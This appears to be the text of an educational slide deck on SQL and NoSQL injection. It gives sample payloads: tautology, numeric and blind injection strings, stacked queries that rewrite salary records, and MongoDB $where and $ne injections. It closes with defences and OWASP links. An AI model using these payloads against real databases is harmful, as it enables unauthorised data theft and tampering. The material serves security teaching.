SQL and NoSQL Injection

Lavanya Mohan

Sailee Bhekare


SQL and NoSQL Injection

Select * from users where user_id = <i/p>         

Easy to Exploit
Severe Impact

Techniques for Exploiting 

SQL Injection 

        1. Fingerprinting the DB
        2. String SQL Injection
        3. Numeric SQL Injection
        4. Blind Numeric Injection
        5. Blind String Injection

Fingerprinting the DB

String SQL Injection

Select * from user_data where last_name = ' Smith '

Smith' OR '1'='1

Select * from user_data 

  where last_name = ' Smith' OR '1'='1 '

Numeric SQL Injection

Select * from weather_data where station =

101 OR 1=1

Blind Numeric SQL Injection

101 AND ((Select pin from pins

where  cc_number ='1111222233334444')>2500)

Blind String SQL Injection

101 AND((Select name from pins 

where  cc_number ='4321432143214321')>'E');

More on SQL Injection

                    1. Update

                    2. Insert



Select * from SALARIES where USERID = ' jsmith '

jsmith';  Update SALARIES

SET SALARY='50000' where USERID='jsmith


Select * from SALARIES where USERID = ' jsmith '

jsmith'; Insert into SALARIES

VALUES ('hpotter','10000000')



No SQL = No Injections??

Example Of MongoDB  NoSQL Injection

Typical User Form: 

db.characters.find({"name" : "Robb"})

Example 1 : 

db.characters.find( { name : 'Robb

', $where: 'function() { sleep(5000); 

 return this.name=="Robb"}



Example 2 :
 Using String Manipulation 


', name:{$ne: 'Robb'} ,address:'Casterly Rock

    Parameterised Queries



    Input Validation 

    Use Appropriate Privileges

    Proper Error Messages

    Keep Secrets Secret !!


      • https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)#Standard_SQL_Injection_Testing

      • https://www.owasp.org/index.php?title=Testing_for_NoSQL_injection&setlang=en

      • https://github.com/shirish4you/NoSQLInjectionDemo

      • https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

      • http://www.syhunt.com/?n=Articles.NoSQLInjection

      • https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

    SQL and NoSQL Injection

    By Lavanya Mohan

    SQL and NoSQL Injection

    • 783